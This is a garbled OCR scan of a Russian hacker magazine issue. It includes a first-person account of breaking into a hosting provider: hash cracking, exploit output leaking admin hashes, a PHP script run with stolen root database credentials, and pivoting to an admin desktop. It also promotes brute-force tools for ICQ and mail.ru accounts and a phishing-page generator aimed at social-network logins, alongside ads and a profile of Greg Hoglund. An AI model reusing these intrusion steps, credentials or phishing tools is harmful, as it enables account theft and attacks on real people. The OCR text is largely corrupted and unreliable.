А841А86ЕА: Е9А7 5ЕІЕАБ4Е9В24А9799Б0 
214ЕСВЕ 

Тут-то нам и пригодятся разнообразные 
методы взлома ЫИМ-хешей (не могу не 
поделиться: пока искал правильные сайты 
для взлома І_М-хешей, нашел забавный сайт 
ипіх.сот . в котором на русский язык оказа- 
лось переведено название Зобп 1:Ье Ріррег — 
дядюшка Соодіе окрестил его Иоанном (свя- 
той брутер, все-таки]]. Советую параллельно 
использовать взлом с помощью радужных 
таблиц, опробование их на специализиро- 



ванных сайтах (как, например, Ітсгаск.сот 
или ЬазЬсгаскіпд.іпію ]. а также собственные 
силы в виде Раззѵѵогсіз Рго и Зобп ібе Ріррег. 
Причем, использование брутера Раззѵѵогсіз 
Рго не исключает использование Зобп 1Ье 
Ріррег, а наоборот, только дополняет. Что в 
итоге? Немного потения процессором и шур- 
шания диском — и вот они, золотые слова: 

Ьгасі : ЬЗ асс!с19 ; т 
Іготт: еЗХЗххЬе 
дсЬоп : 1дЬсоп9 1 1 
3 оеі : БсЬепоІам 



СВЯТОЙ ПРОВАЙДЕР 0МШ5.С0М 



& 



ОПШІ5 



N в- 1 ч* о г к 



5сгѵілд оѵег 

200,000 

Асздмпи *Іпсе 1999* 



24 Ноиг 5ирро« 677393 >Н05Т 

а ііѵі СЬа! 

Опііпё 





ШеЬ Но5(іпд Боіиііопг 

І Оіьк 5 Го гаде — 
□аіа Тгап5?ег | 

Но$іе<І Оотаіп$ 
Му5СІІ_ ОаіаЬа&ек 
Оотаіп Мате ІпсІисІеЦ 



ГогЗО гіау5; 



Ндегіпд РІаг>5 Іпсіигіе; 



30 Оду Нолеу Влек Сиагдпіее 
99^9% ирііте СѵагапІЕее 
РЙЕЕ 5 -ііеВуІІсІег 
ЦпІітііЫ 5 иЬ 0 атаіпБ 
ипіітіігегі РТР Ѵ 5 ег 5 
РНР, РегІ Р РуТЬсп, КиЬу (Йоб) 
А 5 Р, А 5 Р.М ЕГ ( Ассс&з 
5 ЕО ШеЬзіІе РюггиДіоп Ттаі 
Е-тдіІ Ерлт/Ѵітра РШегіпд 
Рориіаг 5 сгврІ ІпаЕаІІагз 
555 1 п Соодіе & ѴаГіоо! Оесіііз 



✓ УпІІтінкІ 

✓ УлІітііесІ 
ѵ Упіітііеё 
^ УпИткесЗ 







АѴѴАІЮ 

№■NN(N6 



ѴѴЕВ 5ІТЕ 
Н05ТІЫС 



Наѵіпд ргоЫотв уоиг 
ѵѵеЬіііе ог Еиѵе а зидеііап дЬоіЛ 
оигягѵіс»? Срліаа аіе 

Него іо апздгсгуаиг аиеіііош. 



зеагсН Гог а йотаіп пате пом: ехат р Іе.сот 



Оотаіп Матез 5іаг{іпд Ргот іиз* $б 95 



Оотаіп Магпек Іпсіисіе: 

4 Еа$у ТгапбГегі 
(Ігкіік№ 4 1 уоаг гёпемаЕ) 
Ѵ' ЕКЕЕ ОН5 МападегЕ 
/ РЙЕЕ ині Гогылгсііпд! 



^ РНСЕ Оотаіп ЬоскКпд! 
* ІЛШШТЕС Ургіаіеі! 

✓ Виік Рмсіпд АнгаіІаЫе 

5 ео а|( {?аіиге&-.. 



ОПОЕН МОМ 



’ ргм гіатаг пмг® оГСег а Іітіікі Ю іпійаі умг оГЛапдп лаги гьдйЕгаЬоп апгі *о ТЮі ргімгі М 53.9$ от Ікз р« уыг. 
55.95 рег топЕЬ ртотд к оѵаІаЫе «Ші а 24 гтопіЬ ргеракІ Ьйпд сусіе. 
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взлом 



■ ■ РА20Р НТТР://РА20К.МАМЕ 



АіѴсігсІ ѴѴіппІпд Коэііпд 



ѴѴег НоьІЧпч 

і II 1й~.-Г!^г і 



Вайде! $3к 
НоМіпд 






к$»и 

ш. 



Ѵ&Ь Нойіпд 
$ео«еЬ 



тор I 

РІСК 

ноггзоов 







емки 




ЧѴЕВН05Т 

ОІЙ^СТОКГ 

АѴѴАКО 

ѴѴІІЧМЕК 



#1 



#1 

вибпгі; 

Нвддад 




ЕШТ 0 К 5 ’ 

СНОІОЕ 



Тор 15 Но5І 



НЕВН08І 



к А г I N Е 



СНЕГ *** 

СегііГиб Ат» Ргеп&г 



ПРОВАЙДЕРУ БОЛ ЬШЕ 10 Л ЕТ, 

И У НЕГО ОЧЕНЬ МНОГО НАГРАД... 
ПОДРОСЛИ, НО НЕ ПОВЗРОСЛЕЛИ 



гоок : Ъ&хісі (сО 





ВОТТАКОЙ ВОТ СТАРЕНЬКИЙ И ПРОСТЕНЬКИЙ Р57-ШЕЛЛ И ВЕРШИТ 
СУДЬБЫ ГОЛИАФОВ (ПОЛЬЗУЯСЬ СЛУЧАЕМ, ПЕРЕДАЮ ПРИВЕТ МОРО) 



г±-‘.і гі ВШ.ЕШк.№ ", ІІ.1М, *ѴВ“| 

1— - ругяі^таѵлігі 1 с ѵ 41* «ѵпсѵЛ іс ®!"]Г 

гіѵн|1 и Ті*г/і - ЕН *1іиа™і от йі* і “с*” : ? на* Зк^іи» '$1 і.м р ~і г 

ІО о ау*а1_фі*ту ( а н-1*св ер[.іег_ѵк1и№ Гги ьр_Ер^і«и кЬ*м 'т * '»"_«« * |, *іни±1 і ■) и эі« і ' ііг.і;» мігев*! і 

і*тт ■ ч»^**?^**»*^» ет ем сдас- {«-ей'і = 

ІО'.З **1Т|0]. 'ѴлГг 

*Івн|і ві йілі'выппщ о1в*і # К < 



ПК ■ ] | ЗПР-пмаатігіо | 



#ЬеашЬо квРагик # - Аф - мпі г рс-2 -2 -5 ді - рі Кх ігр ; //Ъиг пгаапЬей 1 до , с от/ с отрі і X а т г и ск ліеЬаЬу 31 
тНе У5аде 15 соггесі 

[*3 тгуіпд Н05Т Иир://ЬигппіапЬесПагі. сот/ 

[+] ТЬе илІгрс-2-2 зегѵег зеотз го Ье могкіпд 

рЁегпате Тог іс( = 1 І5:“> агілііп 

МсЛ5 ЬазЬ ^пг иьег : агітіп 

1з: 11=Зс53&2?1 : 213сІ^Ь24?гі2Й032сіОс12О30 

иаегоате Тог і-сі = 2 Ія:— > Ьиггтап 

Мсі5 Ьааііі ^пг иьег: Ьигптап 

І5 : т0337304 74339032ВеЗс(63 520^СІЬб 

изогоате- ^ог ісі = 3 1з:~> сотрііта 
мсі5 Іназіг ^ог изег: сотрііга 
і 5 : 1еЬ3074 гЗС9833ІСе3623989328гі2С0а 

ТоТаІ МитЬег изег 5 Войтек — >3 

музді 1 5 гиппіпд аз: Ьигпгаооі^узді . отпіг.сот 



РАБОТА СПЛОИТА НАУЯЗВИМОМ САЙТЕ (ВИДНО ВСЕ — И УЧЕТКИ АД- 
МИНА, И ХЕШИ ЕГО ПАРОЛЕЙ) 



Пробуем вводить полученные пароли прямо 
в логин-шелле, однако получаем отказ — 
шелл у нас индейский (от Апача], для этих 
целей не приспособленный. Придется искать 
обходной путь. Правда, попутное проме- 
жуточное решение тоже ничего — один из 
паролей подошел к тузці-базе данных, кото- 
рая оказалась рядом (по адресу тѵзді.отпіз. 
сот ]. Полученный к СУБД доступ был руто- 
вым — это сильно порадовало, так как среди 
хостеров 0МІЧІ5.С0М немало товарищей с 
РадеПапк 6 и 7, а они (как мы помним] стоят 
денег. С помощью простого скрипта, загру- 
женного через шелл, подбираем доменное 
имя сайта (чтобы оценить затем РадеРапк] 
по имени базы данных и ее типу: 

<?ркр 

$тузд1_изегпате= " д оеі " ; 
$тузд1_раззѵ\гогс1= " кскепоіаѵ/" ; 
$тузд1_козк= "тузді . отпіз . сот" ; 

$11і = Іореп ( "Ьазез . СхС " , "г"); 

вдЬіІе ( ! ПеоП ( $йг) ) 

{ 

$1іпе = Ідекз ( $1к, 4096); 

скор ( $1іпе) ; 

еско "йакаЪазе: ", $1іпе, " \п" ; 

$тс = тузд1_соппеск ( $тузд1_ 
козк, $тузд1_изегпате , $тузд1_ 
раззѵгогсі) ог сііе ( " саппок соппеск 
Со сІЪ! " ) ; 

тузд!_диегу ( "изе $1іпе; " ) 



ог с!іе("саппок изе сіакаказе 
' $1іпе 1 " ) ; 

$д = тузд1_диегу ( " зеіеск 
оркіоп_ѵа1ие кгот ѵтр_оркіопз 
ѵккеге оркіоп_пате = ' зікеигі'" ) 
ог с!іе("саппок зеіеск"); 

$агг = тузд1_:Еекск_аггау ( $д) ог 
сііе ( " саппоС ІеСсЬ" ) ; 
есЪ.о $агг[0], " \п" ; 

тузд1_с1озе ( $тс) ог \ 

Йіе ( " саппоС сіозе"); 

} 

Псіозе ( $П1і) ; 

?> 

Скрипт легко можно модифицировать под 
свои нужды, размер у него микроскопический. 
На вход ему надо подавать имя файлов со 
списком баз данных из тузц!. (благо, с руто- 
вым доступом они известны все], а на выходе 
он будет выдавать вот такой листинг: 

СеашсіеасіЬиппу . сот/ѵтр/ 

Ыод . сопСгоИгеекз . сот. аи/ѵгр/ 
сЗаріСаІопе . со . ик/ 

3 окпасіатз . Сѵ/Ыод02 / 

Ыод . Ъигкѵіііаде . сот/ 
аІЬсіат. сот/ 

3 окаппез . каррсотт . сот/ 

скгіз . ккетагкіпз . сот. аи/ 

сазіпогоаск огд/ 

ѵтѵі . скеткегікаде . огд/ 

скісадосіідікаідгаркісз . сот/ѵдэ/ 



ФИНАЛЬНЫЙ ШТРИХ опытному 

исследователю этого мало — наглеем 
дальше и устанавливаем на хостинг 
прокси-сервер (для этих целей отлично 
подойдет Зргоху]. Как только он уста- 
новлен, нас уже ничего не отделяет от 
рабочих компов админов — они уже 
совсем близко. Настраиваем «прыжок» 
с помощью зоскзсЬаіп от нашего кли- 
ентского подключения на выделенном 
дедике к известному адресу админ- 
ского компа (например, к дсИоп.отпіз. 
сот ]. Включаем РБР-клиент и получаем 
консоль на удаленном рабочем столе с 
ѴѴіпбоѵѵз ХР 5Р2 БЫ. Но самое интерес- 
ное оказалось не в нем (его использова- 
ние вызвало ажиотаж в стане админов, 
и «лавочка» быстро закрылась], а в кон- 
соли управления провайдерскими акка- 
унтами и пользователями — любопытная 
статистика приведена на скриншотах. 
Очевидно, что православный хостинг не 
столь убыточен, как могло бы показаться 
на первый взгляд — заработать за непол 
ных 11 месяцев 1,5 млн. долларов оборо- 
та может не каждый провайдер. 

Общий итог — несмотря на все пред- 
принятые меры безопасности, провай- 
дер сдал свои фортификации под дав- 
лением наших знаний и умений. Читай 
-і~ и все у тебя получится! Как сказали 
бы древние, «0МІЧІ5.С0М теа тесит 
рогіо» или «мой провайдер всегда со 
мной» :]. цц 



► 064 
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Реклама 



Телефон: 

(495) 780-8825 

шшѵ.датеро$1.ги 

Все цены действительны на момент публикации рекламы 




ІМіпІепсіо ѴѴіі РІауЗіаІіоп 2 ЗІіт ХЬох 360 Рт (бо зь) 





НЕ СКУЧАЙ! 
ДОМА И 
В ДОРОГЕ 

ИГРАЙ! 

Принимаем заказы через 
Интернет и по телефону 







РІауЗИІоп 3 (806Ь) 

Возможность доставки 
в день заказа 




Зопу РЗР ЗІіт 

Вазе Раск ВІаск (Р5Р-3008/Ви$) 



Огромный выбор 
компьютерных 
и видеоигр 





ІМагіЛо Шітаіе 
ІМіпіа Зіогт 

1850 р. 



ІМіпіа баісіеп 
Зідта 2 

2000 р. 



Везізіапсе 2 

1200 р. 



ШІе Від РІапеІ 

1200 р. 



} 

і 



КІІІ20ПѲ 2 



1200 р. 



Незісіепі ЕѵіІ 5 

1800 р. 



МеіаІ беаг Зоіісі 4: 
ОипзоІШе Раігіоіз 
1500 р. 



Аззаззіп’з Сгеесі II 
(русская версия) 

2600 р. 







Ваітап: 

Агкііат Азуіит 

2100 р. 



(Ц 

оі Нісісііск: АззаиК 

оп йагк АФепа 

1350 р. 2200 р. 



АТго Зашигаі 
1650 р. 



Сгозз Есіде 
1950 р. 



Ргоюіуре 

2000 р. 



ІпТатоиз: 

Дурная репутация 

(русская версия) 

1250 р. 



МогІаІ КотЬаІ 
ѵз. ОС ІІпіѵегзе 

1600 р. 




ІІІРС 2009 
ІІпсІізриІесІ 

1950 р. 















Х-Т00І-5 



а 



МАГ ІСО 884888, НТТР://\Л/АР-СНАТ.РІІ 



х-тооьз 

ПРОГРАММЫ ДЛЯ ХАКЕРОВ 




\ 



Л 



г \ 






ПРОГРАММА: Іся ВігІЬсІау 
6епегаІог0.2Ь 

ОС: ѴѴІЫ00ѴѴ5 2000/2003/ХР/ 
ѴІ5ТА/7 

АВТОР: Ы0Р5ТЕР 




Интерфейс генератора 

Е слиты занимаешься брутом асекдо, навер- 
няка, не раззамечал, что в паролях юзеров 
зачастую можно встретить вариации на тему их 
дней рождений: 12121980, 19801212, 12198012и 
т.д. Каким образом можно упростить бруттаких 
паролей? Над этим вопросом задумался мембер 
Античата порзіег и создал свой Ісц ВігІЬсІау 
ЭепегаФг— программу, которая предназначена 
для генерации специального брутфорс-списка, 
основанного на переборе всех вариантов написа- 
ния дня рождения пользователя. 

Использовать генератор довольно-таки просто: 

1. Выбираем файл с ІСО-уинами и датами дней 
рождения в формате «иіпДау.топіЬ.уеаг»; 

2 . В поле «Маска» записываем маски — формат 
сохранения даты в итоговом файле, в каждой 
строке должна быть маска, например, в следую- 
щих форматах: 

бту 

сЗши 

бут 

бит 

тисі 

тусі 

тбу 

тсіи 



Символы в маскахзначат следующее: 

6 — день; 
т — месяц; 
у — год, 4символа; 
и — год, 2 символа (1985 -> 85). 

Для примера берем дату 12.12.1980 и III N 
123456, далее вбиваем маски б ту, утб, 
бсИ и бти. 

В итоге мы получаем готовый для пос- 
ледующего брута файлик вот в таком 
формате: 

123456; 12121980 
123456; 19801212 
123456 ; 121212 
123456 ; 121280 

Собственно, программы для брутфорса асекты 
легко сможешь найти в предыдущих выпусках 
Х-Тооіз. 

ПРОГРАММА: МаіІ_5сап [1.4] 

ОС: ѴУШ00ѴѴ5 2000/2003/ХР/ 
ѴІ5ТА/7 

АВТОР: КУ КА5К 




МаіІ_5сап за работой 

Продолжая тему паролей, состоящих из цифр дня 
рождения пользователя, нельзя неупомянугьо 
замечательном бругфорсе МаіІ_5сап отку_казк. 
Прога предназначена для подбора паролей кящи- 
кам на таіі.ги . Действие основано на двух фактах: 

1. Очень часто юзеры указывают в качестве 
пароля свой день рождения [на таіі.ги эта 
тенденция особенно глобальна); 

2 . В МаіКсІа генте присутствует функция поиска 
контактов по дате рождения. 

Теперьдавай представим алгоритм перебора 
паролей по дням рождения без этой специаль- 
ной программы: 

1. В МаіШа генте указываем возраст от 18 до 18 
(то есть 1992 год); 

2 . Дата рождения — 20 января (20.01 ); 

3. Нажимаем кнопку «Поиск», видим на экране 
список из 50 адресов; 



4 . Кидаем найденные мыла в брутфорс с воз- 
можными паролями 2001 1992, 19922001, 200192 

И Т.Д. ; 

5 . Ждем результата. 

Каквидишь, данный алгоритм является очень 
трудоемким, поэтому, не мудрствуя лукаво, 
запускай МаіІ_5сап и указывай в соответствую- 
щих полях следующие данные: 

• рабочий логин и парольдля входа в МаіКсІ 
агент (мыло должно быть именно в зоне Итак, 
ги, а не (ЗЬк.ги ит.д.); 

• возраст, день рождения и пол жертвы; 

Далее, при нажатии кнопки «Старт», прога 
запустит до 200 процессов единовремен- 
но и начнет нелегкий процесс брутфорса 
:). Из особенностей программы следует 
отметить: 

• обход ограничения на количество 
запросов (программа может работать в 
режиме поп- з бор) ; 

• опция перебора по дням (прога 
начнет в цикле переключать дни, 
начиная с того, который был указан 
изначально) ; 

• опция автоочистки кеша (при каждом 
запросе прога удаляет файл таіі . сѵх — 
список уже прочеканных адресов) ; 

• сворачивается в трей; 

• опция «Только онлайн» (ищутся 
любые адреса в онлайне , мертвые и 
заброшенные ящики идут лесом) ; 

• все результаты сеанса после за- 
крытия программы сохраняются в файл 
«Маі1_3сап_гези1б . бхб» . 

Удачного брутфорса и легких паролей! :) 



ПРОГРАММА: АгхРагзіпд 
ОС: ѴѴШР0ѴѴ5 2000/2003/ХР/ 
ѴІ5ТА/7 

АВТОР: АРХѴѴОЬР 

Еслиты занимаешься брутфорсом (неважно 
каким], то знаком с проблемой обработки самых 
различных словарей. Наверняка, у тебя уже 
есть проверенные временем программы под 
эти цели, но, всеже, позволь посоветовать тебе 
замечательный и мощный инструмент для об- 
работки словарей и текстовых файлов любого 
размера — АгхРагзіпд от сообщества ЬДрУ/ 
ѵѵеЬхакер.пеЕ 

Функционал проги впечатляет: 

• опция «Анти дубль» 

• парсер колонок 




/ — у 
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Интерфейс парсера 



• генератор ІПЫ : РА53 

• генератор паролей (английские бук- 
вы, цифры, символы, длина) 

• генератор паролей по маске 
(фтегСу {деп} ) 

• соединение нескольких словарей в 
один (до трех сразу) 

• соединение двух словарей по логину 
и паролю 

• удаление переносов из файла, текст 
в одну строку 

• регулярные выражения — поиск 

• регулярные выражения — замена 

• файл помощи по использованию про- 
граммы 

• логирование работы 




л_ 



Теперь остановимся подробнее на каждом из 
пунктов: 

1. «Анти дубль». 

Суть инструмента заключается в удалении 
дубликатов строк, сортировке, вырезании про- 
белов и строк, которые не подходят по длине. 
Для начала работы с инструментом вводи 
нужныеданные в левое поле (если данные 
содержатся в файле, то его можно выбрать 
внизу слева), затем выбирай опции из раздела 
«Основная обработка» и жми «Начать». 

2 . Парсер колонок. 

Вы водит только ту колонку из спис- 
ка, которая тебе нужна (к примеру, было 
«иіп;ра55;етаіІ;пате», выбираем вторую 
колонку — стало «разз»). 

Для начала работы вводи данные в левое поле 
(или, опять же, выбирай файл), выбирай опции 
из раздела «Работа с колонками», вводи раз- 
делитель и номер колонки и дави «Начать». 

3. Генератор 1)ІІ\І:РА55. 

Инструмент генерирует пасс-листы для 
брутфорса в формате «диапазон цифр+ 
разделитель+пароль». 

Например, у нас есть пароль «раззѵѵогсі» и нам 
необходимо сопоставить его с определенным 
диапазоном асечных номеров. Для этого в по- 
лях «от» и «до» вписываем нужный диапазон, в 
поле «Пароль» — наш пароль, вводим раздели- 
тель и наслаждаемся результатом :). 

4 . Генератор паролей. 

Название инструмента говорит само за себя — 
здесь мы можем сгенерить пароль, исходя из 
нужных нам параметров. 

5 . Генератор паролей по маске. 

Тоже, что и предыдущий инструмент, но здесь 



при генерации мы можем указывать нужные 
нам маски для паролей. 

6 . Весь текст в одну строку. 

Приводим любой текст, вроде 

я 

крутой 

мега 

хакер 

к виду «Якрутоймегахакер!». 

7 . Несколько словарей в один. 

В случае, когда у нас есть несколько словарей, 
но вручную их объединять проблематично, 
юзаем данный инструмент. 

8. Соединить Слово: Па рол и. 

Инструмент для создания хороших словарей. 
Например, у нас имеется 2 файла: пароли в стол- 
бик, асечные номера в столбик. Выбираем эти 
файлы в соответствующих окошках и получаем 
на выходе готовый пасс-лист для брутфорса. 

9 . Обработка регулярными выражениями — 
поиск. 

Этот инструмент предназначен для выдирания 
изтекста нужныхтебе параметров по маске. 
Для начала работы вводи регулярное выра- 
жение в «Поиск значений», выбирай «МаІсЬ» 
(количество совпадений) и начинай поиск. 

10 . Обработка регулярными выражениями — 
замена. 

Заменяем с помощью регулярных выражений 
нужные нам куски текста на новые. 

Если тебе понравилась программа, советую 
регулярно следить за ее обновлениями на 
сайте автора. 

ПРОГРАММА: АгхѴѴРакеОеп 
ОС : ѴѴШ00ѴѴ5 2000/2003/ХР/ 
ѴІ5ТА/7 

АВТОР: АВХѴѴОІ.Р 




Генератор фейков 

Если ты занимаешься «рыбалкой»аккаунтов 
в известных социальных сетях, то, наверняка, 
сталкивался с проблемой создания качествен- 
ных фейков нужных страниц. Вручную делать 
это было крайнетрудозатратно. С программой 
АгхѴѴЕакеОеп отуже известной тебе команды 
ѵѵеЬхакер.пеіты сможешь забыть о технических 
аспектах создания фейков — фейкгенератор 
АгхѴѴЕакеОеп все сделает за тебя! 

Особенности программы: 

• мощные алгоритмы регулярных выражений; 



• удобный и настраиваемый интерфейс; 

• создание фейков любой сложности; 

• поддержка протоколов Шр и Шрз; 

• замена локальных путей в зге, ЬгеГ (Эітроіі, 
Еогт.Асбоп, ЬаскдгоипсІ, ЬаскдгоипсМтаде; 

• полностью автоматическая генерация фейков 

• генерациятрех файлов (і псіех. рГір, Іодіп.рГір, 
Ьазе.рбр); 

• возможность выбора типа базы (локальная 
или отправка логов на почту); 

• выбортипа главной (і псіех. рГір, іпсіех. Ы:ппІ, 
іпбех.Ыт); 

• дополнительная замена строк (до 5); 

• возможность указания переадресации; 

• встроенные шаблоны («ВКонтакте», «Одно- 
классники», «Яндекс», Ооодіе, Маіі.ги); 

• возможность выбора кодировки страницы; 

• возможность вырезания іаѵазегірі:; 

• встроенная отладка программы. 

Созданные программой фейки не отличишь на 
первый взгляд от страниц настоящих сайтов, 
та к что тв о и же ртв ы будут с уд о в ол ьств и е м 
вбивать свои приватные данные в формы под- 
ставной страницы :) 

ПРОГРАММА: 

005САКМа55імроСна№ЕК 
ОС: ѴѴІЫ00ѴѴ5 2000/2003/ХР/ 
ѴІ5ТА/7 

АВТОР: ВАІМКОВ 




Массовая смена инфы 

Напоследок представляю еще одну программу 
для работы с нашей любимой тетей Асей — 
ООЭСАРМаззІпіюСЬапдег. 

Каквидно из названия, тулза предназначена 
для массовой смены информации на множес- 
твеуинов. 

Можно менять следующую информацию: ник, 
имя, фамилию, страну проживания, город 
проживания, пол, дату рождения, подпись 
(поле«аЬоиЫ. 

Особенности проги: 

• МНОГОПОТОЧНОСТЬ; 

• поддержка кириллицы; 

• кроссплатформенность (основана на СИ:); 

• сворачивается в трей ; 

• возможность указания таймаута; 

• счетчик прочека иных, измененных и ошибоч- 
ных номеров. 

Для более подробной информации о програм- 
ме, атакже для своевременной установки 
обновлений советую посетить сайтавтора 

ЫПрѴ/ах-зоН.ги . т 



Г 
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СЕГОДНЯ Я РАССКАЖУ ТЕБЕ ОБ ИЗВЕСТНОМ ХАКЕРЕ И НАСТОЯЩЕМ 
«ЧЕЛОВЕКЕ-ОРКЕСТРЕ». СОГЛАСИСЬ. ДАЛЕКО НЕ ВСЕ ВЕДУЩИЕ 
ЭКСПЕРТЫ В ОБЛАСТИ ИБ УСПЕВАЮТ НЕ ТОЛЬКО РАБОТАТЬ. НО 
И ПИСАТЬ КНИГИ, СТАТЬИ. ВЕСТИ БЛОГИ И САЙТЫ. ЕЗДИТЬ ПО 
ВСЕВОЗМОЖНЫМ КОНФЕРЕНЦИЯМ СДОКЛАДАМИ И. ПРИ ВСЕМ 
ПРИ ЭТОМ. ЖИВО ИНТЕРЕСОВАТЬСЯ ОНЛАЙНОВЫМИ ИГРАМИ И 
ВОЗМОЖНОСТЬЮ ИХ ВЗЛОМА. ЧТО Ж. ПОЗНАКОМЬСЯ С ГРЕГОМ 
ХОГЛАНДОМ. 



Обычно рассказы о «жизни замечательных лю- 
дей» начинаются с даты их рождения, а также с 
нудного перечисления мест, где будущий гений 
рос, ходил в детский садик, школу, университет 
и такдалее. Но сегодня нетот случай. Мы, в 
общем-то, и рады бы рассказать, когда Грег 
Хогланд появился на свети где произошло это 
знаменательное событие, да только сам мистер 
Хогланд не спешитафишировать та кие детали 
своей биографии. Поэтому, не размениваясь на 
биографические данные, придется нам ограни- 
читься исключительно его рабочей деятель- 
ностью, благо, ее имеется в избытке и никакой 
«великой тайны» она собой не представляет. 

ВСЕ. ЧТО ВЫ ХОТЕЛИ ЗНАТЬ О РУТКИТАХ 

Итак, чем известен ГрегХогланд? Узкому кругу 
интересующихся сценой он уже очень давно 
знаком какпризнанный эксперт в области 



информационной безопасности и какчеловек, 
собаку съевший на реверсном инжиниринге, 
и завсегдатай многих серьезных хакерских 
конференций и слетов — йеГСоп, ВІаскНаІ, П5А 
итакдалее. 

Здесь удивляться, в общем-то, нечему — 
Грегначал интересоваться информацион- 
ной безопасностью или, попросту говоря, 
подался в хакеры, когда само понятие «ин- 
формационная безопасность» еще только 
зарождалось. Деревья тогда были больши- 
ми, домашние компы для человечества были 
в новинку, а информатику и смежные с ней 
дисциплины еще не преподавали во всех 
подряд учебных заведениях, включая даже 
провинциальные колледжи. Кстати, именно 
по последней причине Хогланд, как и многие 
другие «первые ласточки»— самоучка. 
Однако реверсный инжиниринг, хаки и пуб- 



ликации в культовых езинах вроде РЬгаскэто 
хорошо, но широкой аудитории, а неузкому 
кругу гиков Хогланд стал известен значительно 
позже. Пожалуй, не покривив душой, можно 
сказать, что «славу мирскую» ему принес гром- 
кий скандал с компанией ВІіггагсІ, имевший 
место в 2005 году. Дело в том, что с наступлени- 
емХХІ века и появлением всяческих онлайно- 
вых игр Хогланд всерьез и надолго заинтере- 
совался этой областью, подсев на мморпг в не 
совсем типичном смысле. 

Что ж, теперь, пожалуй, пора привнести кон- 
кретики, а именно — рассказать тебе, чем же 
наш герой отличился перед узкими и не очень 
кругами. 

Помимо всего уже перечисленного, ГрегХог- 
ландеще и писатель. Давным-давно, открыв 
в себеталант разбираться в хитросплетениях 
кода и понимать механизмы различных атак, 



► 068 



ХАКЕР 01 /133/ 09 





ХОГЛАНД И МАКГРОУ ПРЕДСТАВЛЯЮТ СВОЮ КНИГУ 



он также заметил один «побочный эффект» 

— у него оченьхорошо и складно получалось 
объяснять людям, не столь сведущим в теме, 
как все работает, зачем и почему. Пренебрегать 
этим неожиданным открытием Хогланд не стал 
и впоследствии оттачивал уже нетолько хакер- 
ские, но и писательские навыки. 

За свою весьма продолжительную карьеру он 
успел написать целый ворох статей, постов 
и даже несколько книг. Но начало всему 
положила публикация в 55-м номере езина 
РЬгаск, вышедшая в 1 999 году. Она носила 
говорящее название: «А*НЕАІ_* І\ІТ Рооікіі:, 
раісбіпд Ібе І\ІТ Кегпеі» и посвящалась, как 
нетрудно догадаться, именно руткитам. И вот 
здесь кроется интересный нюанс — дело в том, 
что ѵѵіпсіоѵѵз-руткиты, фактически, появились 
спустя почти десятилетие послетак называе- 
мых стелс-вирусов, и тот факт, что их назвали 
именно руткитами, а не стелс-вирусами — 
заслуга исключительно Грега Хогланда и той 
самой статьи во РЬгаск. 

Вообще, Хогланддовольно долго бился над 
реализацией техники обхода системных меха- 
низмов защиты ѴѴіпсІоѵѵз— начиная, примерно, 
с середины 90-х. В своих исследованиях он 
опирался на исследования ядра ѴѴіпсІоѵѵз, опуб- 
ликованные в Бзепеі: неким прогером из Шри- 
Ланки, атакже на более ранние исследования 
всемирно известного гуру Джефри Рихтера. В 
итоге, Хогланд воплотил все это в жизнь виде 
утилиты, нацеленной на сокрытие информации 
в системе. Еготулза называлась І\ІТ Рооікіі, а 
отчето проделанной работе, свои мысли по это- 
му поводу и много чего еще он изложил как раз 
втой самой статье. Воттак, слегкой руки Грега, 
подобные софтины и стали называть руткитами, 
а сам Хогланд увековечил себя в истории :). 

В дальнейшем исследования Хогланда, 
конечно, не концентрировались вокруг одних 
только руткитов, хотя он до сих пор регулярно 



выступает на всевозможных конах и форумах с 
лекциями и семинарами именно на этитемы. Но 
Хогланд занимался и исследованием 64-битных 
платформ на предмет всевозможныхуязвимос- 
тей, и цифровыми подписями, и многим, многим 
другим. Дело втом, что, добившись статуса 
эксперта и влившись в нестройные хакерские 
ряды, Грег пошел проторенным путем — 
решил сделать из всего этого бизнес. На 
сегодняшний деньХогланд успел выступить 
сооснователем трех фирм: НВОагу, Сепгіс 
(ранее известная какСІіскТоЗесиге) и Видзсап. 
Все перечисленные конторы, само собой, 
занимаются милым сердцу Грега реверсным 
инжинирингом, разрабатывают софт для ловли 
«плохих парней» и предоставляют самые 
различные секьюруслуги. И качество работы 
Хогланда отлично характеризует один простой 
факт— компания НВСагу на постоянной основе 
сотрудничаете Министерством обороны США, 
и военные сотрудничеством очень довольны. 

По сути, официальная, ежедневная работа 
Грега — это многомиллионные контракты, пос- 
тупающие прямиком от правительства США. 
Удивительно, как при этом у него, вообще, 
остается время на что-то, кроме работы, но оно, 
тем не менее, остается. 

Не забывая и о писательской стезе, Хогланд, 
на текущий момент, является автором уже трех 
книг, две из которых получили весьма широкое 
признание: это написанная в соавторстве с 
Гари МакГроу «Взлом программного обеспече- 
ния: анализ и использование кода» (Ехріоібпд 
Во^ѵѵаге) и «Руткиты: внедрение в ядро 
ѴѴіпсІоѵѵ5» (РооГкіІз, ЗиЬѵегбпд іЬе ѴѴіпсІоѵѵз 
Кегпеі). Обе книги издавались на русском, а о 
третьем, оставшемся труде речь пойдет чуть 
ниже. 

Помимо книг, Грегуже много летуспеваетза- 
ниматься небезызвестным сайтом ѵѵѵѵѵѵ.гооІкіГ 
от . основателем которого является и куда пе- 




НАСТОЛЬНАЯ КНИГА КАЖДОГО УВАЖАЮЩЕГО СЕБЯ 
ЧИТЕРА:) 



риодически пишет. Ас 2008 года Хогланд ведет 
блог по адресу ІазОзогігоп.ЫодзроГсот . 

ФАРМИНГСУМОМ 

ГрегХогланд не только талантливый хакер и пи- 
сатель, он, ко всему прочему, еще и геймер. Да, 
сложно поверить вто, что такой занятой человек 
успевает играть в игрушки, но это чистая правда. 
Болеетого, какуже было сказано выше — 
с появлением разнообразных онлайновых 
забав Хогланд переключился именно на них. И, 
конечно, стоило ему окунуться в удивительный 
мир мморпг, какв немтутже проснулся хакер. 
Наш герой буквально не могнезаинтересо- 
ваться возможностью хакинга онлайновых 
игр, а когда заинтересовался, то сделал это не 
спустя рукава. 

Одним из первых«громких плодов» интереса 
Хогланда к играм стал скандал с компанией 
ВІіггагсІ. В их многопользовательское детище — 
ѴѴогІб оІѴѴагсгаК — Хогланд играл с самой 
закрытой беты, игра ему искренне нравилась 
и именно она стала главным объектом для 
изучений. Но в ходе исследований Грегобна- 
ружил очень странную вещь: при ближайшем 
рассмотрении программный модульТЬе 
ѴѴагбеп («Надсмотрщик»), входящий в состав 
клиента игры, оказался самым настоящим 
зруѵѵаге, сующим свой виртуальный нос во 
все подряд. Вообще, ѴѴагбеп и предназначен 
именно для слежки — он приглядывает, чтобы 
пользователь не запускал ботов, не использо- 
вал запрещенные аддоны, дающие серьезное 
внутриигровое преимущество, не пытался 
модифицировать софт и так далее. 

